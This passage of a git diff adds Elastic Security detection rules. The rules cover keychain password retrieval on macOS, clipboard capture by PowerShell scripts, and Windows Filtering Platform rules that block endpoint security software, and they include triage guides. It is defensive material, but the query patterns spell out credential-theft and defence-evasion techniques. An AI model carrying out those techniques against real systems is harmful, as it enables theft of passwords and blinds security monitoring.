guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "90169566-2260-4824-b8e4-8615c3b4ed52_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_107.json b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_107.json new file mode 100644 index 00000000000..5898e3bb6ec --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_107.json @@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may collect keychain storage data from a system to in order to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features, including Wi-Fi and website passwords, secure notes, certificates, and Kerberos.", + "false_positives": [ + "Applications for password management." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Keychain Password Retrieval via Command Line", + "query": "process where host.os.type == \"macos\" and event.type == \"start\" and\n process.name : \"security\" and process.args : \"-wa\" and process.args : (\"find-generic-password\", \"find-internet-password\") and\n process.args : (\"Chrome*\", \"Chromium\", \"Opera\", \"Safari*\", \"Brave\", \"Microsoft Edge\", \"Edge\", \"Firefox*\") and\n not process.parent.executable : \"/Applications/Keeper Password Manager.app/Contents/Frameworks/Keeper Password Manager Helper*/Contents/MacOS/Keeper Password Manager Helper*\"\n", + "references": [ + "https://www.netmeister.org/blog/keychain-passwords.html", + "https://github.com/priyankchheda/chrome_password_grabber/blob/master/chrome.py", + "https://ss64.com/osx/security.html", + "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "9092cd6c-650f-4fa3-8a8a-28256c7489c9", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.001", + "name": "Keychain", + "reference": "https://attack.mitre.org/techniques/T1555/001/" + } + ] + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.003", + "name": "Credentials from Web Browsers", + "reference": "https://attack.mitre.org/techniques/T1555/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "9092cd6c-650f-4fa3-8a8a-28256c7489c9_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_108.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_108.json new file mode 100644 index 00000000000..728520c0490 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_108.json @@ -0,0 +1,157 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can get the contents of the clipboard, which attackers can abuse to retrieve sensitive information like credentials, messages, etc.", + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\program?files\\\\powershell\\\\?\\\\Modules\\\\*.psd1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\*.psd1" + } + } + } + }, + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\Program?Files\\\\WindowsPowerShell\\\\Modules\\\\*.ps?1" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Script with Clipboard Retrieval Capabilities", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Clipboard Retrieval Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities to get the contents of the clipboard with the goal of stealing credentials and other valuable information, such as credit card data and confidential conversations.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Determine whether the script stores the captured data locally.\n- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users are unlikely to use scripting utilities to capture contents of the clipboard, making false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Prioritize the response if this alert involves key executives or potentially valuable targets for espionage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n (powershell.file.script_block_text : (\n \"Windows.Clipboard\" or\n \"Windows.Forms.Clipboard\" or\n \"Windows.Forms.TextBox\"\n ) and\n powershell.file.script_block_text : (\n \"]::GetText\" or\n \".Paste()\"\n )) or powershell.file.script_block_text : \"Get-Clipboard\" and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n ) and\n not user.id : \"S-1-5-18\" and\n not (\n file.path : C\\:\\\\Program?Files\\\\WindowsPowerShell\\\\*Modules*.ps1 and\n file.name : (\"Convert-ExcelRangeToImage.ps1\" or \"Read-Clipboard.ps1\")\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-clipboard", + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-ClipboardContents.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1115", + "name": "Clipboard Data", + "reference": "https://attack.mitre.org/techniques/T1115/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "92984446-aefb-4d5e-ad12-598042ca80ba_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_8.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_8.json new file mode 100644 index 00000000000..6183b33a715 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_8.json @@ -0,0 +1,116 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can get the contents of the clipboard, which attackers can abuse to retrieve sensitive information like credentials, messages, etc.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Suspicious Script with Clipboard Retrieval Capabilities", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Clipboard Retrieval Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities to get the contents of the clipboard with the goal of stealing credentials and other valuable information, such as credit card data and confidential conversations.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Determine whether the script stores the captured data locally.\n- Investigate whether the script contains exfiltration capabilities and identify the exfiltration server.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users are unlikely to use scripting utilities to capture contents of the clipboard, making false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Prioritize the response if this alert involves key executives or potentially valuable targets for espionage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n (powershell.file.script_block_text : (\n \"Windows.Clipboard\" or\n \"Windows.Forms.Clipboard\" or\n \"Windows.Forms.TextBox\"\n ) and\n powershell.file.script_block_text : (\n \"]::GetText\" or\n \".Paste()\"\n )) or powershell.file.script_block_text : \"Get-Clipboard\" and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n ) and\n not user.id : \"S-1-5-18\" and\n not file.path : (\n ?\\:\\\\\\\\program?files\\\\\\\\powershell\\\\\\\\?\\\\\\\\Modules\\\\\\\\*.psd1 or\n ?\\:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\Modules\\\\\\\\*.psd1 or\n ?\\:\\\\\\\\WINDOWS\\\\\\\\system32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\Modules\\\\\\\\*.psd1 or\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\*.psd1 or\n ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\Modules\\\\\\\\*.psm1\n ) and \n not (\n file.path : ?\\:\\\\\\\\Program?Files\\\\\\\\WindowsPowerShell\\\\\\\\*Modules*.ps1 and\n file.name : (\"Convert-ExcelRangeToImage.ps1\" or \"Read-Clipboard.ps1\")\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-clipboard", + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-ClipboardContents.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1115", + "name": "Clipboard Data", + "reference": "https://attack.mitre.org/techniques/T1115/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 8 + }, + "id": "92984446-aefb-4d5e-ad12-598042ca80ba_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/92d3a04e-6487-4b62-892d-70e640a590dc_2.json b/packages/security_detection_engine/kibana/security_rule/92d3a04e-6487-4b62-892d-70e640a590dc_2.json new file mode 100644 index 00000000000..9dcd98af262 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/92d3a04e-6487-4b62-892d-70e640a590dc_2.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple Windows Filtering Platform block events and where the process name is related to an endpoint security software. Adversaries may add malicious WFP rules to prevent Endpoint security from sending telemetry.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.*", + "logs-system.security-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Evasion via Windows Filtering Platform", + "query": "sequence by winlog.computer_name with maxspan=1m\n [network where host.os.type == \"windows\" and \n event.action : (\"windows-firewall-packet-block\", \"windows-firewall-packet-drop\") and \n process.name : (\n \"bdagent.exe\", \"bdreinit.exe\", \"pdscan.exe\", \"pdiface.exe\", \"BDSubWiz.exe\", \"ProductAgentService.exe\",\n \"ProductAgentUI.exe\", \"WatchDog.exe\", \"CarbonBlackClientSetup.exe\", \"TrGUI.exe\", \"TracCAPI.exe\", \"cpmsi_tool.exe\",\n \"trac.exe\", \"vna_install64.exe\", \"vna_utils.exe\", \"TracSrvWrapper.exe\", \"vsmon.exe\", \"p95tray.exe\",\n \"CybereasonRansomFreeServiceHost.exe\", \"CrAmTray.exe\", \"minionhost.exe\", \"CybereasonSensor.exe\", \"CylanceUI.exe\",\n \"CylanceProtectSetup.exe\", \"cylancesvc.exe\", \"cyupdate.exe\", \"elastic-agent.exe\", \"elastic-endpoint.exe\",\n \"egui.exe\", \"minodlogin.exe\", \"emu-rep.exe\", \"emu_install.exe\", \"emu-cci.exe\", \"emu-gui.exe\", \"emu-uninstall.exe\",\n \"ndep.exe\", \"spike.exe\", \"ecls.exe\", \"ecmd.exe\", \"ecomserver.exe\", \"eeclnt.exe\", \"eh64.exe\", \"EHttpSrv.exe\",\n \"xagt.exe\", \"collectoragent.exe\", \"FSAEConfig.exe\", \"uninstalldcagent.exe\", \"rmon.exe\", \"fccomint.exe\",\n \"fclanguageselector.exe\", \"fortifw.exe\", \"fcreg.exe\", \"fortitray.exe\", \"fcappdb.exe\", \"fcwizard.exe\", \"submitv.exe\",\n \"av_task.exe\", \"fortiwf.exe\", \"fortiwadbd.exe\", \"fcauth.exe\", \"fcdblog.exe\", \"fcmgr.exe\", \"fortiwad.exe\",\n \"fortiproxy.exe\", \"fortiscand.exe\", \"fortivpnst.exe\", \"ipsec.exe\", \"fcwscd7.exe\", \"fcasc.exe\", \"fchelper.exe\",\n \"forticlient.exe\",\"fcwsc.exe\", \"FortiClient.exe\", \"fmon.exe\", \"FSSOMA.exe\", \"FCVbltScan.exe\", \"FortiESNAC.exe\",\n \"EPCUserAvatar.exe\", \"FortiAvatar.exe\", \"FortiClient_Diagnostic_Tool.exe\", \"FortiSSLVPNdaemon.exe\", \"avp.exe\",\n \"FCConfig.exe\", \"avpsus.exe\", \"klnagent.exe\", \"klnsacwsrv.exe\", \"kl_platf.exe\", \"stpass.exe\", \"klnagwds.exe\",\n \"mbae.exe\", \"mbae64.exe\", \"mbae-svc.exe\", \"mbae-uninstaller.exe\", \"mbaeLoader32.exe\", \"mbaeloader64.exe\",\n \"mbam-dor.exe\", \"mbamgui.exe\", \"mbamservice.exe\", \"mbamtrayctrl.exe\", \"mbampt.exe\", \"mbamscheduler.exe\",\n \"Coreinst.exe\", \"mbae-setup.exe\", \"mcupdate.exe\", \"ProtectedModuleHost.exe\", \"ESConfigTool.exe\", \"FWInstCheck.exe\",\n \"FwWindowsFirewallHandler.exe\", \"mfeesp.exe\", \"mfefw.exe\", \"mfeProvisionModeUtility.exe\", \"mfetp.exe\", \"avpui.exe\", \n \"WscAVExe.exe\", \"mcshield.exe\", \"McChHost.exe\", \"mfewc.exe\", \"mfewch.exe\", \"mfewcui.exe\", \"fwinfo.exe\",\n \"mfecanary.exe\", \"mfefire.exe\", \"mfehidin.exe\", \"mfemms.exe\", \"mfevtps.exe\", \"mmsinfo.exe\", \"vtpinfo.exe\",\n \"MarSetup.exe\", \"mctray.exe\", \"masvc.exe\", \"macmnsvc.exe\", \"McAPExe.exe\", \"McPvTray.exe\", \"mcods.exe\",\n \"mcuicnt.exe\", \"mcuihost.exe\", \"xtray.exe\", \"McpService.exe\", \"epefprtrainer.exe\", \"mfeffcoreservice.exe\",\n \"MfeEpeSvc.exe\", \"qualysagent.exe\", \"QualysProxy.exe\", \"QualysAgentUI.exe\", \"SVRTgui.exe\", \"SVRTcli.exe\",\n \"SVRTcli.exe\", \"SVRTgui.exe\", \"SCTCleanupService.exe\", \"SVRTservice.exe\", \"native.exe\", \"SCTBootTasks.exe\",\n \"ALMon.exe\", \"SAA.exe\", \"SUMService.exe\", \"ssp.exe\", \"SCFService.exe\", \"SCFManager.exe\", \"spa.exe\", \"cabarc.exe\",\n \"sargui.exe\", \"sntpservice.exe\", \"McsClient.exe\", \"McsAgent.exe\", \"McsHeartbeat.exe\", \"SAVAdminService.exe\",\n \"sav32cli.exe\", \"ForceUpdateAlongSideSGN.exe\", \"SAVCleanupService.exe\", \"SavMain.exe\", \"SavProgress.exe\", \n \"SavProxy.exe\", \"SavService.exe\", \"swc_service.exe\", \"swi_di.exe\", \"swi_service.exe\", \"swi_filter.exe\",\n \"ALUpdate.exe\", \"SophosUpdate.exe\", \"ALsvc.exe\", \"SophosAlert.exe\", \"osCheck.exe\", \"N360Downloader.exe\",\n \"InstWrap.exe\", \"symbos.exe\", \"nss.exe\", \"symcorpui.exe\", \"isPwdSvc.exe\", \"ccsvchst.exe\", \"ntrmv.exe\",\n \"pccntmon.exe\", \"AosUImanager.exe\", \"NTRTScan.exe\", \"TMAS_OL.exe\", \"TMAS_OLImp.exe\", \"TMAS_OLSentry.exe\",\n \"ufnavi.exe\", \"Clnrbin.exe\", \"vizorhtmldialog.exe\", \"pwmConsole.exe\", \"PwmSvc.exe\", \"coreServiceShell.exe\",\n \"ds_agent.exe\", \"SfCtlCom.exe\", \"MBAMHelper.exe\", \"cb.exe\", \"smc.exe\", \"tda.exe\", \"xagtnotif.exe\", \"ekrn.exe\",\n \"dsa.exe\", \"Notifier.exe\", \"rphcp.exe\", \"lc_sensor.exe\", \"CSFalconService.exe\", \"CSFalconController.exe\",\n \"SenseSampleUploader.exe\", \"windefend.exe\", \"MSASCui.exe\", \"MSASCuiL.exe\", \"msmpeng.exe\", \"msmpsvc.exe\",\n \"MsSense.exe\", \"esensor.exe\", \"sentinelone.exe\", \"tmccsf.exe\", \"csfalconcontainer.exe\", \"sensecncproxy.exe\",\n \"splunk.exe\", \"sysmon.exe\", \"sysmon64.exe\", \"taniumclient.exe\"\n )] with runs=5\n", + "references": [ + "https://github.com/dsnezhkov/shutter/tree/main", + "https://github.com/netero1010/EDRSilencer/tree/main", + "https://www.mdsec.co.uk/2023/09/nighthawk-0-2-6-three-wise-monkeys/", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5157", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5152" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "92d3a04e-6487-4b62-892d-70e640a590dc", + "setup": "## Setup\n\nThe 'Filtering Platform Connection' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nFiltering Platform Connection (Success,Failure)\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.004", + "name": "Disable or Modify System Firewall", + "reference": "https://attack.mitre.org/techniques/T1562/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "92d3a04e-6487-4b62-892d-70e640a590dc_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/92d3a04e-6487-4b62-892d-70e640a590dc_3.json b/packages/security_detection_engine/kibana/security_rule/92d3a04e-6487-4b62-892d-70e640a590dc_3.json new file mode 100644 index 00000000000..fe9d78a4caa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/92d3a04e-6487-4b62-892d-70e640a590dc_3.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple Windows Filtering Platform block events and where the process name is related to an endpoint security software. Adversaries may add malicious WFP rules to prevent Endpoint security from sending telemetry.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.network-*", + "logs-system.security-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Evasion via Windows Filtering Platform", + "query": "sequence by winlog.computer_name with maxspan=1m\n [network where host.os.type == \"windows\" and \n event.action : (\"windows-firewall-packet-block\", \"windows-firewall-packet-drop\") and \n process.name : (\n \"bdagent.exe\", \"bdreinit.exe\", \"pdscan.exe\", \"pdiface.exe\", \"BDSubWiz.exe\", \"ProductAgentService.exe\",\n \"ProductAgentUI.exe\", \"WatchDog.exe\", \"CarbonBlackClientSetup.exe\", \"TrGUI.exe\", \"TracCAPI.exe\", \"cpmsi_tool.exe\",\n \"trac.exe\", \"vna_install64.exe\", \"vna_utils.exe\", \"TracSrvWrapper.exe\", \"vsmon.exe\", \"p95tray.exe\",\n \"CybereasonRansomFreeServiceHost.exe\", \"CrAmTray.exe\", \"minionhost.exe\", \"CybereasonSensor.exe\", \"CylanceUI.exe\",\n \"CylanceProtectSetup.exe\", \"cylancesvc.exe\", \"cyupdate.exe\", \"elastic-agent.exe\", \"elastic-endpoint.exe\",\n \"egui.exe\", \"minodlogin.exe\", \"emu-rep.exe\", \"emu_install.exe\", \"emu-cci.exe\", \"emu-gui.exe\", \"emu-uninstall.exe\",\n \"ndep.exe\", \"spike.exe\", \"ecls.exe\", \"ecmd.exe\", \"ecomserver.exe\", \"eeclnt.exe\", \"eh64.exe\", \"EHttpSrv.exe\",\n \"xagt.exe\", \"collectoragent.exe\", \"FSAEConfig.exe\", \"uninstalldcagent.exe\", \"rmon.exe\", \"fccomint.exe\",\n \"fclanguageselector.exe\", \"fortifw.exe\", \"fcreg.exe\", \"fortitray.exe\", \"fcappdb.exe\", \"fcwizard.exe\", 